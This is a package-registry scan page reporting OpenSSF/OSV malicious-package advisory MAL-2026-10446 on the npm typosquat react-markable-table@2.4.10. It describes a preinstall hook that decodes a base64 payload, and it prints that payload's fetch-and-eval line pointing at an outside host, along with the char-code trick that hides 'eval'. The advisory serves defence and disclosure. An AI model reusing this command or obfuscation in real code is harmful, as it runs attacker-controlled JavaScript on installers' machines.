registry  /  react-markable-table  /  2.4.10

react-markable-table@2.4.10

OSV Malicious Advisory

scanned 8h ago · by OpenSSF/OSV

OpenSSF/OSV advisory MAL-2026-10446 confirms this npm version as malicious. react-markable-table@2.4.10 is a typosquat of markdown-table (declared repo field `wooorm/markdown-table`). package.json declares a `preinstall` hook that runs `node index.d.js`. That script base64-decodes an embedded payload which resolves to `eval(await fetch('https://everydaynodechecker-39143n.vercel.app/api/key?mem=root2').then(r=>r.text()))`, and invokes it via `globalThis[tag](text)` where `tag` is...

Advisory
MAL-2026-10446
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in react-markable-table (npm)
Details
react-markable-table@2.4.10 is a typosquat of markdown-table (declared repo field `wooorm/markdown-table`). package.json declares a `preinstall` hook that runs `node index.d.js`. That script base64-decodes an embedded payload which resolves to `eval(await fetch('https://everydaynodechecker-39143n.vercel.app/api/key?mem=root2').then(r=>r.text()))`, and invokes it via `globalThis[tag](text)` where `tag` is reconstructed from the char-code array `[101,118,97,108]` (spelling `eval`). Installing the package causes arbitrary attacker-controlled JavaScript to be fetched from a non-publisher Vercel host and executed in-process on the installer's machine at `npm install` time.
Decision reason
OpenSSF Malicious Packages via OSV confirms react-markable-table@2.4.10 as malicious (MAL-2026-10446): Malicious code in react-markable-table (npm)

Source & flagged code

0 flagged
No flagged code excerpts are attached to this scan.

Findings

1 High
HighOsv Malicious Advisory